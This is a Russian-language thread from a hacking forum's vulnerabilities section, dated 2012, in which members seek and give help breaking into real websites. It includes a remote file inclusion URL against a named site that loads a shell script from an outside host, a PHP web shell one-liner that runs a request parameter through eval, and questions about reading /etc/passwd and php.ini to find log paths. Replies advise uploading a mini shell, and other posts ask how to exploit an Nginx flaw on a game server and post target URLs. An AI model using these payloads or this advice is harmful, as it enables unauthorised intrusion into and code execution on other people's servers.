HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21541  
Старый 27.10.2012, 09:18
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

не знаю чё такое у меня

ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt

просто пустая страница,а в исходнике код и всё
 
Ответить с цитированием

  #21542  
Старый 27.10.2012, 09:33
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR
 
Ответить с цитированием

  #21543  
Старый 28.10.2012, 23:13
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?
 
Ответить с цитированием

  #21544  
Старый 28.10.2012, 23:20
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Пути к логам ошибок задаются в настройках apache в файле httpd.conf

распрастранненые пути файлов настроек сможешь посмотреть сдесь,

Цитата:
Сообщение от None  
https://www.forum.antichat.ru/thread324564.html
 
Ответить с цитированием

  #21545  
Старый 29.10.2012, 00:02
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
не знаю чё такое у меня
ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt
просто пустая страница,а в исходнике код и всё
Кэп подсказывает, что это не инклуд, а file_get_contents()
 
Ответить с цитированием

  #21546  
Старый 29.10.2012, 00:12
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?
В php.ini есть параметр "error_log", он указывает на путь к логам ошибок интерпритации, но как максимум это только FPD.
 
Ответить с цитированием

  #21547  
Старый 29.10.2012, 00:46
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

На хостингах обычно, что естественно, используются логически упорядоченные скелеты конфигураций хостов. Те , что-то вида: /serv/userXXX/conf/vhost.conf и подобное. Тупое спихивание конфигураций в httpd.conf или конфигов массово в папку а-ля sites-enabled способствует ухудшению удобства в настройке и использовании, а так-же не неверно сточки зрения изоляции уникального клиента. То-же касается и php.ini файла. Но это банальная схема для среднестатистического хостинга. Иные конфигурации используются в случаях если система не очень масштабна или следование логически верным построениям конфигурации системы не очень строги. Опять-же, излишняя унификация не столь необходима в случаях небольшого количества виртуальных хостов на сервере.
 
Ответить с цитированием

  #21548  
Старый 29.10.2012, 00:56
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2Faaax залей на свой хост мини шелл и работай постом, все там робит.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #21549  
Старый 29.10.2012, 13:17
DasTem
Guest
Сообщений: n/a
Провел на форуме:
8374

Репутация: 0
По умолчанию

как использовать эту уязвимость?

Nginx buffer underflow vulnerability

Вот читал про нее:

http://www.securelist.com/ru/advisories/36751

Хелп, нашел в одной игре)
 
Ответить с цитированием

  #21550  
Старый 29.10.2012, 21:28
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

http://elektri4ka.com/kino.php?info=270622&carcas=0

Кто сможет помочь?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ